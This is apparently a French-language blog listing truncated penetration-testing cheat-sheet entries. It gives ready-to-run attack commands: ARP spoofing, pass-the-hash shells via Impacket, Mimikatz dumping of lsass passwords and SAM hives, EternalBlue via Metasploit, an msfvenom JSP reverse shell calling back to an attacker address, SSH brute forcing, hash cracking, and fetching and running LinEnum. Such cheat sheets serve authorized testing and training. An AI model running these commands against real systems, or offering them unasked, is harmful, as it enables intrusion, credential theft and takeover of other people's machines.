ARP spoofing. arpspoof est inclus dans le package dsniff # arpspoof -t 10.5.23.42 10.5.23.1 (modifier la table arp de la machine 10.5.23.42) # arpspoof -t 10.5.23.1 10.5.23.42 (modifier la table arp du routeur) Sur la machine de l’attaquant (pour faire suivre le paquet au bon mac adress, notre table arp n`est pas corrompu). Aussi, obtenir une mac … Continuer la lecture
Obtenir un Shell via pass-the-hash (Impacket Tools) # ./psexec.py -hashes :thehash domaine/usager@192.168.2.22 Obtenir le fichier sam des ordinateurs d’un sous-réseau # crackmappexec -u Administrator -H :thehash 10.5.24.0/24 –sam Obtenir les partages avec pass-the-hash. smbclient.py est un outil de Impacket # ./smbclient.py domaine/usager@192.168.2.99 -hashes :hash Obtenir un remote desktop via pass-the-hash # xfreerdp /u:usage /d:domaine /pth: … Continuer la lecture
Démarrer Mimikatz et créer un fichier de log # mimikatz.exe # privilege::debug # log c:\temp\mylog.log Lire la mémoire du processus lsass.exe (avec procdump ou taskmgr) # sekurlsa::minidump lsass.dmp Montrer les mots de passe / hashes des usagers connectés # sekurlsa::logonpasswords Copier les clés de registre SYSTEM et SAM # reg save HKLM\SYSTEM system.hiv # reg … Continuer la lecture
PowerSploit Pour trouver des services exploitables ou des DLL ou des clés de registre qui peuvent être exploités # powershell.exe -nop -exec bypass # import-module .\powerup.ps1 # Invoke-AllChecks Autres outils pour trouver des exploits pour élever vos droits et avoir davantage de privilèges: Windows Exploit Suggester New Generation (wesng) Ajouter un administrateur local # net … Continuer la lecture
Voir l’information qui peut nous permettre d’escalader nos privilèges vers un shell administrateur # curl -o /LinEnum https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh # bash ./linEnum -r /tmp/report Vérifier les protections utilisés https://raw.githubusercontent.com/germainm/check_linux_defenses/main/enumerate_linux_defenses.sh Extraire la mémoire d’un processus à la recherche de mots de passe #!/bin/bash #./dump-memory.sh <PID> grep rw-p /proc/$1/maps \ | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \ | … Continuer la lecture
Démarrer un serveur Python sur le port 1337 # python3 -m http.server 1337 Performer une requête HTTP # curl http://www.searchevolution.com Options CURL -k: accepte les certificats même s’ils ne sont pas vérifiés par un autorité (self-signed) -d “param1=test” : données HTTP POST -H “Accept-Encoding: gzip, deflate” : entêtes HTTP -I : requête HTTP HEAD -L … Continuer la lecture
Démarrer Metasploit # msfconsole Chercher un exploit: # search eternalblue Utiliser un exploit # use exploit/windows/smb/ms17_010_eternalblue Configurer les paramètres de l’exploit # show options # set TARGET 192.168.2.55 Exécuter l’exploit # exploit Générer le code pour un reverse SHELL (WAR). Pour hacker un serveur Apache Tomcat # msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.33 LPORT=443 -f war > … Continuer la lecture
Essayer une attaque bruteforce pour le service SSH avec une liste de mots de passe # ncrack -p 22 –user root -P ./motdepasse.txt 192.168.2.0/24 Déterminer le type de hash # hashid thehash Montre des examples de hash # hashcat –example-hashes | grep -A2 -B2 rar Cracker des hash (par exemple rar: 13000) # hashcat -m … Continuer la lecture
Recherche d’exploits (avec une copie locale de Exploit-DB) # searchsploit mysql Trouver l’exploit sur le disque local et le copier dans le presse-papier # searchsploit -p 41954 Quelques sites internet pour trouver des exploits cvedetails.com exploit-db.com packetstormsecurity.com
Outils TLS Créer un certificat que vous signez: # openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -nodes -subj "/CN=searchevolution.com/" Démarrer un serveur TLS # ncat –ssl -l -p 1337 –ssl-cert cert.pem –ssl-key key.pem Se connecter à un serveur TLS # ncat –ssl 192.168.2.33 1337 Se connecter à un serveur TLS en utilisant openssl … Continuer la lecture